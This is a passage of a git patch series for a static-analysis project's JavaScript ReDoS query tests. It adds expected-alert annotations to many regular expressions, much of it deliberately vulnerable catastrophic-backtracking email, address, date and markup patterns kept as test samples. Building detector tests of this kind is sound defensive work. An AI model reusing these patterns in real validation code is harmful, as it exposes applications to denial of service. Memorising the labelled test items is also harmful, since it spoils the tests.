.../query-tests/Security/CWE-400/ReDoS/polynomial-redos.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js index 30b64fd37a8c..95e58d2f060c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/polynomial-redos.js @@ -14,7 +14,7 @@ app.use(function(req, res) { tainted.replace(/^.*\./, ''); tainted.replace(/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/); // $ Alert[js/polynomial-redos] tainted.replace(/^(`+)([\s\S]*?[^`])\1(?!`)/); // $ Alert[js/polynomial-redos] - /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] + /^(.*,)+(.+)?$/.test(tainted); // $ Alert[js/polynomial-redos] Alert[js/redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]+|[\u0600-\u06FF\/]+(\s*?[\u0600-\u06FF]+){1,2}/i); // $ Alert[js/polynomial-redos] tainted.match(/[0-9]*['a-z\u00A0-\u05FF\u0700-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]{1,256}|[\u0600-\u06FF\/]{1,256}(\s*?[\u0600-\u06FF]{1,256}){1,2}/i); // $ Alert[js/polynomial-redos] - even though it is a proposed fix for the above tainted.match(/^(\+|-)?(\d+|(\d*\.\d*))?(E|e)?([-+])?(\d+)?$/); // $ Alert[js/polynomial-redos] @@ -38,12 +38,12 @@ app.use(function(req, res) { tainted.match(/<.*href="([^"]+)".*>/); // $ Alert[js/polynomial-redos] tainted.match(/^([^-]+)-([A-Za-z0-9+/]+(?:=?=?))([?\x21-\x7E]*)$/); // $ Alert[js/polynomial-redos] - tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert - it is a fix for the above, but it introduces exponential complexity elsewhere + tainted.match(/^([^-]+)-([A-Za-z0-9+/=]{44,88})(\?[\x21-\x7E]*)*$/); // $ Alert[js/redos] - it is a fix for the above, but it introduces exponential complexity elsewhere tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([\n \t]+([^\n]+))?$/); // $ Alert[js/polynomial-redos] tainted.match(/^([a-z0-9-]+)[ \t]+([a-zA-Z0-9+\/]+[=]*)([ \t]+([^ \t][^\n]*[\n]*)?)?$/); - tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert - also flagged by js/redos + tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)+$/); // $ Alert[js/redos] - also flagged by js/redos tainted.match(/^(?:\.?[a-zA-Z_][a-zA-Z_0-9]*)(?:\.[a-zA-Z_][a-zA-Z_0-9]*)*$/); tainted.replaceAll(/\s*\n\s*/g, ' '); // $ Alert[js/polynomial-redos] From 51fb3dad74da0f851d2dd3c2034723bbb58cb23d Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 09:31:10 +0100 Subject: [PATCH 041/115] JS: Accept ReDoS alerts in regexplib --- .../CWE-400/ReDoS/regexplib/address.js | 4 ++-- .../Security/CWE-400/ReDoS/regexplib/dates.js | 2 +- .../Security/CWE-400/ReDoS/regexplib/email.js | 16 +++++++-------- .../CWE-400/ReDoS/regexplib/markup.js | 20 +++++++++---------- .../Security/CWE-400/ReDoS/regexplib/misc.js | 18 ++++++++--------- .../CWE-400/ReDoS/regexplib/strings.js | 12 +++++------ .../Security/CWE-400/ReDoS/regexplib/uri.js | 12 +++++------ 7 files changed, 42 insertions(+), 42 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js index ba005a21fdef..d22023d27dd0 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/address.js @@ -48,7 +48,7 @@ /^(\d{2}-\d{2})*$/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; +/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /(^0.*[1-9]*)|(^860+)|(^8613)|(\D)|([0-9])/g; /(077|078|079)\s?\d{2}\s?\d{6}/g; @@ -72,7 +72,7 @@ /^(\d{2}-\d{2})*$/g; /^(?:\([2-9]\d{2}\)\ ?|(?:[2-9]\d{2}\-))[2-9]\d{2}\-\d{4}$/g; /^[1-9]{1}[0-9]{3}\s?[A-Z]{2}$/g; -/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; +/^\s*((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)\,?\s+((?:(?:\d+(?:\x20+\w+\.?)+(?:(?:\x20+STREET|ST|DRIVE|DR|AVENUE|AVE|ROAD|RD|LOOP|COURT|CT|CIRCLE|LANE|LN|BOULEVARD|BLVD)\.?)?)|(?:(?:P\.\x20?O\.|P\x20?O)\x20*Box\x20+\d+)|(?:General\x20+Delivery)|(?:C[\\\/]O\x20+(?:\w+\x20*)+))\,?\x20*(?:(?:(?:APT|BLDG|DEPT|FL|HNGR|LOT|PIER|RM|S(?:LIP|PC|T(?:E|OP))|TRLR|UNIT|\x23)\.?\x20*(?:[a-zA-Z0-9\-]+))|(?:BSMT|FRNT|LBBY|LOWR|OFC|PH|REAR|SIDE|UPPR))?)?\,?\s+((?:[A-Za-z]+\x20*)+)\,\s+(A[LKSZRAP]|C[AOT]|D[EC]|F[LM]|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEHINOPST]|N[CDEHJMVY]|O[HKR]|P[ARW]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])\s+(\d+(?:-\d+)?)\s*$/g; // $ Alert[js/redos] /[0-9]{4}\s*[a-zA-Z]{2}/g; /^(\d{3}-\d{3}-\d{4})*$/g; /^\d{5}((\-|\s)?\d{4})?$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js index 39d1669109e4..14468a515657 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/dates.js @@ -24,7 +24,7 @@ /((\d{2})|(\d))\/((\d{2})|(\d))\/((\d{4})|(\d{2}))/g; /^((0[1-9])|(1[0-2]))$/g; /^(\d{2}((0[1-9]|1[012])(0[1-9]|1\d|2[0-8])|(0[13456789]|1[012])(29|30)|(0[13578]|1[02])31)|([02468][048]|[13579][26])0229)$/g; -/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; +/^(?:\s*(Sun|Mon|Tue|Wed|Thu|Fri|Sat),\s*)?(0?[1-9]|[1-2][0-9]|3[01])\s+(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+(19[0-9]{2}|[2-9][0-9]{3}|[0-9]{2})\s+(2[0-3]|[0-1][0-9]):([0-5][0-9])(?::(60|[0-5][0-9]))?\s+([-\+][0-9]{2}[0-5][0-9]|(?:UT|GMT|(?:E|C|M|P)(?:ST|DT)|[A-IK-Z]))(\s*\((\\\(|\\\)|(?<=[^\\])\((?)|(?<=[^\\])\)(?<-C>)|[^\(\)]*)*(?(C)(?!))\))*\s*$/g; // $ Alert[js/redos] /^((31(?! (FEB|APR|JUN|SEP|NOV)))|((30|29)(?! FEB))|(29(?= FEB (((1[6-9]|[2-9]\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00)))))|(0?[1-9])|1\d|2[0-8])-(JAN|FEB|MAR|MAY|APR|JUL|JUN|AUG|OCT|SEP|NOV|DEC)-((1[6-9]|[2-9]\d)\d{2})$/g; /^[0-9]{4}-(((0[13578]|(10|12))-(0[1-9]|[1-2][0-9]|3[0-1]))|(02-(0[1-9]|[1-2][0-9]))|((0[469]|11)-(0[1-9]|[1-2][0-9]|30)))$/g; /^([0]?[1-9]|[1][0-2])[./-]([0]?[1-9]|[1|2][0-9]|[3][0|1])[./-]([0-9]{4}|[0-9]{2})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js index a68c66d2fea8..f7ab34777169 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js @@ -1,16 +1,16 @@ -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] /(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})/g; /^((?>[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+\x20*|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*"\x20*)*(?<))?((?!\.)(?>\.?[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+)+|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*")@(((?!-)[a-zA-Z\d\-]+(?)$/g; /^\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,3}$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; -/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] +/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; // $ Alert[js/redos] /^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*\.(([0-9]{1,3})|([a-zA-Z]{2,3})|(aero|coop|info|museum|name))$/g; /(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\"))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\")))*)@(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\]))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\])))*)/g; /^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}$/g; /^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$/g; /^(([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+([;.](([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+)*$/g; /\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*([,;]\s*\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*)*/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; +/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; // $ Alert[js/redos] /^([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/g; /^\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$/g; /^[\w-]+(?:\.[\w-]+)*@(?:[\w-]+\.)+[a-zA-Z]{2,7}$/g; @@ -22,16 +22,16 @@ /^\W{0,5}[Rr]e:\W[a-zA-Z0-9]{1,10},\W[a-z]{1,10}\W[a-z]{1,10}\W[a-z]{1,10}/g; /^([\w\d\-\.]+)@{1}(([\w\d\-]{1,67})|([\w\d\-]+\.[\w\d\-]{1,67}))\.(([a-zA-Z\d]{2,4})(\.[a-zA-Z\d]{2})?)$/g; /^([\w\-\.]+)@((\[([0-9]{1,3}\.){3}[0-9]{1,3}\])|(([\w\-]+\.)+)([a-zA-Z]{2,4}))$/g; -/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; +/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; // $ Alert[js/redos] /^[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9]@[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9][\.][a-z0-9]{2,4}$/g; /(?(?![ ])(\w|[.])*@(\w|[.])*)/g; /\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$|^([0-9a-zA-Z'\.]{3,40})\*|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\.([0-9a-zA-Z']+)$|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\*+$|^$/g; /[\w-]+@([\w-]+\.)+[\w-]+/g; /^(?:[a-zA-Z0-9_'^&/+-])+(?:\.(?:[a-zA-Z0-9_'^&/+-])+)*@(?:(?:\[?(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\.){3}(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\]?)|(?:[a-zA-Z0-9-]+\.)+(?:[a-zA-Z]){2,}\.?)$/g; /^((?[a-z]:)|(\\\\(?[0-9]*[a-z\-][a-z0-9\-]*)\\(?[^\.\x01-\x1F\\""\*\?<>:|\\/][^\x01-\x1F\\""\*\?|><:\\/]*)))?(?(?(\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))?(?[\\/](\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))*)?[\\/]?$/g; -/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; +/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; // $ Alert[js/redos] +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] /^[\w-]+(\.[\w-]+)*@([a-z0-9-]+(\.[a-z0-9-]+)*?\.[a-z]{2,6}|(\d{1,3}\.){3}\d{1,3})(:\d{4})?$/g; /^[\w\.=-]+@[\w\.-]+\.[\w]{2,3}$/g; /^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js index 31edb6c76ddc..db5d45df0f74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js @@ -1,27 +1,27 @@ /<[^>]*\n?.*=("|')?(.*\.jpg)("|')?.*\n?[^<]*>/g; /<[^>]*>/g; -/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; +/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; // $ Alert[js/redos] /\xA9/g; /(?'DateLiteral' (?# Per the VB Spec : DateLiteral ::= '#' [ Whitespace+ ] DateOrTime [ Whitespace+ ] '#' ) \#\s* (?'DateOrTime' (?# DateOrTime ::= DateValue Whitespace+ TimeValue | DateValue | TimeValue ) (?'DateValue' (?# DateValue ::= Whitespace+ TimeValue | DateValue | TimeValue ) ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Day 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{1,4}) \s+ (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? ) | ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Month 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{4}) ) | ( (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? ) ) ) \s*\# )/g; /(SELECT\s[\w\*\)\(\,\s]+\sFROM\s[\w]+)| (UPDATE\s[\w]+\sSET\s[\w\,\'\=]+)| (INSERT\sINTO\s[\d\w]+[\s\w\d\)\(\,]*\sVALUES\s\([\d\w\'\,\)]+)| (DELETE\sFROM\s[\d\w\'\=]+)/g; -/"([^"](?:\\.|[^\\"]*)*)"/g; +/"([^"](?:\\.|[^\\"]*)*)"/g; // $ Alert[js/redos] /href=[\"\'](http:\/\/|\.\/|\/)?\w+(\.\w+)*(\/\w+(\.\w+)?)*(\/|\?\w*=\w*(&\w*=\w*)*)?[\"\']/g; //g; /(?s)( class=\w+(?=([^<]*>)))|()|()|()|([^<]*<\/o:p>)|(]*>)|(<\/span>)|(font-family:[^>]*[;'])|(font-size:[^>]*[;'])(?-s)/g; -/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; +/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; // $ Alert[js/redos] /<(?.*).*>(?.*)<\/\k>/g; /<(\/{0,1})img(.*?)(\/{0,1})\>/g; /src[^>]*[^/].(?:jpg|bmp|gif)(?:\"|\')/g; -/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; +/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; // $ Alert[js/redos] /(?i:on(blur|c(hange|lick)|dblclick|focus|keypress|(key|mouse)(down|up)|(un)?load|mouse(move|o(ut|ver))|reset|s(elect|ubmit)))/g; 